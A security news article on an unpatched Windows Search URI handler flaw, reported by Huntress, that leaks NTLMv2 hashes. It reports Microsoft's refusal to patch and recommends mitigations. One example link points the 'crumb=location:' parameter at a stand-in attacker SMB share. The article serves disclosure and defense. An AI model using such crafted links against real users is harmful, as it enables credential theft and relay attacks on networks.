Cybersecurity researchers have uncovered a new Windows vulnerability that could allow attackers to capture a victim’s NTLMv2 hash and potentially use it to gain unauthorized access to corporate networks.
The issue, disclosed by Huntress, affects Windows’ search: URI handler and remains unpatched despite being responsibly reported to Microsoft. Researchers warn that the flaw can be triggered through a specially crafted link, making it a potential phishing and credential theft risk.
Similar to a Recently Patched Windows Vulnerability
The newly disclosed flaw shares similarities with CVE-2026-33829, a spoofing vulnerability in the Windows Snipping Tool that Microsoft patched in April 2026.
That earlier issue involved the application’s ms-screensketch: URI handler, which could be abused to force a victim’s system to connect to an attacker-controlled SMB server. During that connection, Windows would automatically attempt NTLM authentication, exposing the user’s NTLMv2 hash.
The newly discovered vulnerability follows the same attack pattern but targets a different Windows component.
How the Attack Works
According to Huntress researchers, the vulnerability resides in the Windows Search URI handler (search:).
An attacker can craft a malicious link that includes a specially designed crumb=location: parameter pointing to a remote SMB share controlled by the attacker.
For example:
search:query=test&crumb=location:\\attacker-server\share
If a victim clicks the link and approves its execution, Windows may attempt to connect to the specified SMB resource. This triggers an NTLM authentication request, exposing the victim’s Net-NTLMv2 hash to the attacker.
Researchers noted that the flaw effectively recreates the same credential leakage mechanism seen in the Snipping Tool vulnerability.
Why NTLMv2 Hash Leakage Matters
Although the vulnerability does not directly reveal a user’s password, the exposed NTLMv2 hash can still be highly valuable to attackers.
Captured hashes can be used for:
- NTLM relay attacks
- Lateral movement within networks
- Unauthorized authentication attempts
- Privilege escalation scenarios
- Access to internal services and systems
In enterprise environments where NTLM authentication remains enabled, leaked hashes can provide attackers with an entry point for broader network compromise.
Not the First Time
The technique of abusing the crumb parameter for NTLM hash disclosure is not entirely new.
A related issue, tracked as CVE-2023-35636, was previously documented by security researchers at Varonis in 2024. The latest discovery demonstrates that similar attack vectors remain possible within Windows URI handlers.
According to Huntress researcher Andrew Schwartz, the newly identified flaw shares nearly identical characteristics with the previously patched Snipping Tool vulnerability, including:
- The same NTLM leakage mechanism
- The same attack prerequisites
- The same Net-NTLMv2 hash exposure
- A comparable security severity rating
Microsoft Declines to Patch the Issue
Huntress reported the vulnerability to Microsoft on April 15, 2026.
However, Microsoft reportedly determined that the issue does not meet its servicing threshold for immediate remediation.
According to the researchers, Microsoft responded that only vulnerabilities rated as Important or Critical qualify for servicing under its current policy.
As a result, no official security update has been released at the time of writing.
Recommended Mitigations
Until a patch becomes available, organizations are encouraged to implement defensive measures to reduce exposure.
Block Outbound SMB Traffic
Prevent systems from initiating unnecessary SMB connections to external hosts by blocking:
- TCP Port 445
- TCP Port 139
This is one of the most effective ways to prevent NTLM hash leakage attacks.
Enable SMB Signing
Enforcing SMB signing helps protect against NTLM relay attacks by ensuring SMB communications cannot be tampered with or relayed by attackers.
Disable NTLM Authentication
Organizations should consider disabling NTLM wherever feasible and transitioning to more secure authentication protocols such as Kerberos.
Strengthen User Awareness
Since exploitation relies on users clicking specially crafted links, security awareness training and phishing-resistant controls can help reduce the likelihood of successful attacks.
Final Thoughts
The discovery highlights an ongoing challenge within Windows environments: legacy authentication mechanisms such as NTLM continue to create opportunities for credential theft and relay attacks.
While the newly disclosed Windows Search flaw may not be considered severe enough for an immediate Microsoft patch, security teams should not ignore the risk. Organizations that continue to rely on NTLM authentication should review their exposure, implement recommended mitigations, and monitor for suspicious SMB traffic that could indicate exploitation attempts.
As long as NTLM remains in use, vulnerabilities capable of leaking authentication hashes will continue to represent a valuable attack vector for threat actors.
